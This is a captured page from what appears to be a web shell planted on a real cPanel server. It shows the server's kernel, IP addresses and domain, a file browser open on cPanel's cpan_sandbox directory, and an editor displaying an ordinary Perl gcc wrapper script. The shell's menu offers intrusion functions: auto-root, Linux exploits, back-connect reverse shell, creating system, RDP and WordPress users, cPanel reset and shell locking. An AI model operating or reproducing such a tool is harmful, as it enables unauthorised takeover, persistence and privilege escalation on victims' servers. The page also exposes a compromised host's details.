Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.117.170.80
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
cpanel /
scripts /
cpan_sandbox /
x86_64 /
[ HOME SHELL ]
Name
Size
Permission
Action
cc
600
B
-rwxr-xr-x
gcc
600
B
-rwxr-xr-x
mysql_config
369
B
-rwxr-xr-x
perl
574
B
-rwxr-xr-x
xml2-config
367
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cc
#!/usr/local/cpanel/3rdparty/bin/perl $ENV{'LANG'} = 'C'; sub sixtyfoursort { if ( $a =~ /64/ ) { return 999999; } $a cmp $b; } my @paths = grep( !/cpan_sandbox/, split( /:/, $ENV{'PATH'} ) ); foreach my $path (@paths) { if ( -x $path . '/' . 'gcc' ) { my @LDS = grep( /^\-L/, @ARGV ); my @NONLDS = grep( !/^\-L/, @ARGV ); @ARGV = sort sixtyfoursort @LDS; push( @ARGV, @NONLDS ); print STDERR "gcc-64bit-hack: enabled\n"; local $ENV{'PATH'} = join( ':', @paths ); exec( $path . '/' . 'gcc', @ARGV ); } } die;
Close